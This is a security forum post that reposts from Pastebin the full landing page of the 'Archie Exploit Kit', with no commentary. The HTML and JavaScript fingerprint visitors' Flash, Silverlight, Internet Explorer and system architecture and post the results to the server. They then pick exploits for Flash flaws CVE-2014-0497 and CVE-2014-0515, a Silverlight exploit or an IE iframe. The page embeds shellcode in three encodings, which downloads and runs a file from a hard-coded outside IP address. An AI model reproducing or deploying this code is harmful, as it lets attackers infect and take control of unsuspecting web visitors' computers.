Jump to content
Nytro

Archie Exploit Kit

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted 

    

    *** @PhysicalDrive0 ***

    2       <html>
    3       <head>
    4       <script type="text/javascript" src="pluginDet.js"></script>
    5       <style type="text/css">
    6       html, body { height: 100%; overflow: auto; }
    7       body { padding: 0; margin: 0; }
    8       #form1 { height: 99%; }
    9       #silverlightControlHost { text-align:center; }
    10      </style>
    11          <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    12      </head>
    13      <body>
    14      </body>
    15      <script>
    16      var payload = "FCE8A20000006089E531D2648B52308B520C8B52148B7228528B52108B423C8B44027885C0744801D0508B48188B582001D3E33A498B348B01D631FF31C0AC84C07407C1CF0D01C7EBF43B7D2475E3588B582401D3668B0C4B8B581C01D38B048B01D0894424205A61595A51FFE0585A8B12EBA16A40680010000068000400006A006854CAAF91FFD5C389C8C1E902F2A588C180E103F2A4C331C0505051535068361A2F70FFD5C35D686F6E00006875726C6D54688E4E0EECFFD5E8B4FFFFFF505068040100006833CA8A5BFFD5508B74240401C6B065880646B02E880646B064880646B06C880646B06C880646B000
    8806EB228B4C24088B1C2451E898FFFFFF688E4E0EECFFD568983A000068B0492DDBFFD5EB21E8D9FFFFFF687474703A2F2F3134342E37362E33362E36373A383038332F6464005858585858C3";
    17      var payload2 = "0x0018A164,0xC0830000,0x81208b08,0xFFF830C4,0xA2E8FCFF,0x60000000,0xD231E589,0x30528B64,0x8B0C528B,0x728B1452,0x528B5228,0x3C428B10,0x7802448B,0x4874C085,0x8B50D001,0x588B1848,0xE3D30120,0x348B493A,0x31D6018B,0xACC031FF,0x0774C084,0x010DCFC1,0x3BF4EBC7,0xE375247D,0x24588B58,0x8B66D301,0x588B4B0C,0x8BD3011C,0xD0018B04,0x20244489,0x5A59615A,0x58E0FF51,0xEB128B5A,0x68406AA1,0x00001000,0x00040068,0x68006A00,0x91AFCA54,0x89C3D5FF,0x02E9C1C8,0xC188A5F2,0xF203E180,0xC031C3A4,0x5351
    5050,0x1A366850,0xD5FF702F,0x6F685DC3,0x6800006E,0x6D6C7275,0x4E8E6854,0xD5FFEC0E,0xFFFFB4E8,0x685050FF,0x00000104,0x8ACA3368,0x50D5FF5B,0x0424748B,0x65B0C601,0xB0460688,0x4606882E,0x068864B0,0x886CB046,0x6CB04606,0xB0460688,0xEB068800,0x244C8B22,0x241C8B08,0xFF98E851,0x8E68FFFF,0xFFEC0E4E,0x3A9868D5,0xB0680000,0xFFDB2D49,0xE821EBD5,0xFFFFFFD9,0x70747468,0x312F2F3A,0x372E3434,0x36332E36,0x3A37362E,0x33383038,0x0064642F,0x58585858,0x9090C358";
    18      
    19      var payload3 = "/OiiAAAAYInlMdJki1Iwi1IMi1IUi3IoUotSEItCPItEAniFwHRIAdBQi0gYi1ggAdPjOkmLNIsB1jH/McCshMB0B8HPDQHH6/Q7fSR141iLWCQB02aLDEuLWBwB04sEiwHQiUQkIFphWVpR/+BYWosS66FqQGgAEAAAaAAEAABqAGhUyq+R/9XDicjB6QLypYjBgOED8qTDMcBQUFFTUGg2Gi9w/9XDXWhvbgAAaHVybG1UaI5ODuz/1ei0////UFBoBAEAAGgzyopb/9VQi3QkBAHGsGWIBkawLogGRrBkiAZGsGyIBkawbIgGRrAAiAbrIotMJAiLHCRR6Jj///9ojk4O7P/VaJg6AABosEkt2//V6yHo2f///2h0dHA6Ly8xNDQuNzYuMzYuNjc6ODA4My9kZABYWFhYWMOQkJA=";
    20      
    21      function spanAppend(val)
    22      {
    23          var a = document.createElement("span");
    24          document.body.appendChild(a);
    25          a.innerHTML = val;
    26      }
    27      
    28      function flashLow()
    29      {
    30          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" /><param name="movie" value="flashlow.swf" /><param name="allowScriptAccess" value="always" /><param name="FlashVars" value="id='+payload+'" /><param name="Play" valu
    e="true" /></object>');
    31      }
    32      
    33      function flashHigh()
    34      {
    35          spanAppend('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" allowScriptAccess=always width="1" height="1" id="23kjsdf"><param name="movie" value="flashhigh.swf" /><param name="FlashVars" value="sh='+payload2+'" /></object>');
    36      }
    37      
    38      function silverHigh()
    39      {
    40          spanAppend('<form id="form1" runat="server" ><div id="silverlightControlHost"><object data="data:application/x-silverlight-2," type="application/x-silverlight-2" width="100%" height="100%"><param name="source" value="silverapp1.xap"/><param name="background" value="white" /><param name="InitParams" value="payload='+p
    ayload3+'" /></object></div></form>');
    41      }
    42      
    43      function fV(val)
    44      {
    45          return PluginDetect.isMinVersion("Flash", val);
    46      }
    47      
    48      function sV(val)
    49      {
    50          return PluginDetect.isMinVersion("Silverlight", val);
    51      }
    52      
    53      function ie(turl)
    54      {
    55      w = "frameBorder";
    56      r = "width";
    57      q = "iframe";
    58      s = "height";
    59      z = "createElement";
    60      c = "src";
    61      g = '10';
    62      hh = turl;
    63      ha = document.createElement(q);
    64      ha[w] = '0';
    65      ha[r] = g;
    66      ha[s] = g;
    67      b = ha[c] = hh;
    68      document.body.appendChild(ha);
    69      return;
    70      }
    71      
    72      function ieVerOk()
    73      {
    74          t = "test";
    75      try {
    76      j = window.navigator.userAgent.toLowerCase();
    77      x = /MSIE[\/\s]\d+/i [t](j);
    78      m = /Win64;/i [t](j);
    79      z = /Trident\/(\d)/i [t](j) ? parseInt(RegExp.$1) : null;
    80      if (!m && x && z && (z == 6 || z == 5 || z == 4)) {
    81      return true
    82      }
    83      } catch (exc) {}
    84      return false
    85      }
    86      
    87      function ieVer() {
    88      t = "test";
    89      try {
    90          if (window.msCrypto)
    91              return 11;
    92          if (window.atob)
    93              return 10;
    94          if (document.addEventListener)
    95              return 9;
    96          if (window.JSON && document.querySelector)
    97              return 8;
    98          if (window.XMLHttpRequest)
    99              return 7;
    100     } catch (exc) { }
    101     return 0
    102     }
    103    
    104     function arch() {
    105     try
    106     {
    107     var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
    108     xmlDoc.async = false;
    109     xmlDoc.loadXML('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "res://c:\\Program Files (x86)\\Internet Explorer\\iexplore.exe">');
    110     if (xmlDoc.parseError.errorCode == -2147023083)
    111     {
    112     return 64;
    113     }
    114     }
    115     catch (ex)
    116     {
    117     return 0;
    118     }
    119     return 32;
    120     }
    121    
    122     var flashVer = PluginDetect.getVersion("Flash");
    123     var Branch = 0;
    124     if (flashVer == "11,0,1,152"
    125     || flashVer == "11,1,102,55" || flashVer == "11,1,102,62"
    126     || flashVer == "11,1,102,63" || flashVer == "11,2,202,228"
    127     || flashVer == "11,2,202,233" || flashVer == "11,2,202,235")
    128         Branch = 1;
    129    
    130    
    131     if (fV("11,3,300,257") == 1 && (fV("11,7,700,276") == -0.1))
    132         Branch = 2;
    133     if (fV("11,8,800,94") == 1 && (fV("13,0,0,183") == -0.1))
    134         Branch = 2;
    135    
    136     var silverVer = PluginDetect.getVersion("Silverlight");
    137     var silverBranch = 0;
    138     if (sV("4,0,50401,0") == 1 && sV("5,1,10412,0") == -0.1)
    139         silverBranch = 1;
    140    
    141    
    142     var adoberVer = PluginDetect.getVersion("AdobeReader");
    143     var adoberBranch = 0;
    144    
    145     var archSys = arch();
    146     var ieVersion = 0;
    147     if (archSys != 0)
    148         ieVersion = ieVer();
    149    
    150     var sendstr = "";
    151     sendstr += encodeURI("dump=" + flashVer + "|" + silverVer + "|" + adoberVer + "|" + archSys + "|" + ieVersion + "|" + Branch);
    152     sendstr += encodeURI("&ua=" + window.navigator.userAgent);
    153     sendstr += encodeURI("&ref=" + document.referrer);
    154    
    155     if (Branch == 0 && silverBranch == 1)
    156     Branch = 3;
    157     if (Branch == 0 && archSys != 0)
    158         Branch = 4;
    159    
    160     try
    161     {
    162     var xmlhttp = new XMLHttpRequest();
    163     xmlhttp.open("POST", "/foo", false);
    164     xmlhttp.send(sendstr);
    165     }
    166     catch (exc){}
    167    
    168    
    169     switch (Branch)
    170     {
    171         //2014-0497
    172         case 1:
    173         flashLow();
    174         break;
    175        
    176         //2014-0515
    177         case 2:
    178         flashHigh();
    179         break;
    180        
    181         case 3:
    182         silverHigh();
    183         break;
    184        
    185         case 0:
    186         case 4:
    187         //var avar = archSys == 32 ? 0 : 1;
    188     //ie("/phazar.html?a="+avar);
    189    
    190         ie("/iebasic.html");
    191         break;
    192     }
    193    
    194    
    195     </script>
    196     </html>

Sursa: Archie Exploit Kit - Pastebin.com

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...